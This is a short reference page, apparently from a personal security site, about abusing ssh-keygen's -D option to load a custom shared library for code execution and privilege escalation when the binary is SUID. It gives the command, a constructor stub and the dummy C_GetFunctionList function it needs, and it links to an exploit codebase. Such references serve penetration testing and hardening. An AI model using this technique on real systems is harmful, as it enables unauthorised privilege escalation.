Skip to content
heschl.dev

ssh-keygen

Code execution/Privilege escalation

The binary ssh-keygen can be made to load custom libraries via the -D switch. This can result in arbitrary code execution. If ssh-keygen has SUID set, this can also lead to privilege escalation.

Terminal window
ssh-keygen -D /path/to/custom/library.so

The easiest way to write a library in such a way that its code is executed by ssh-keygen is to add a library constructor __attribute__((constructor)).

void __attribute__ ((constructor)) constructor() {
    printf("I will be executed on library load!");
}

Note that ssh-keygen makes a rudimentary check before loading a library! In particular, it checks for the existence of a function C_GetFunctionList(). The function signature does not matter, but it has to be present!

int C_GetFunctionList() {
  return 1;
}

A ready-made codebase for getting code execution is available here. This codebase also preserves the effective user id. Useful if ssh-keygen is run with SUID for example.

References

  1. ssh-keygen man page
  2. Blog post by Sean Pesce
  3. Modified lib2shell codebase for exploiting the ssh-keygen behaviour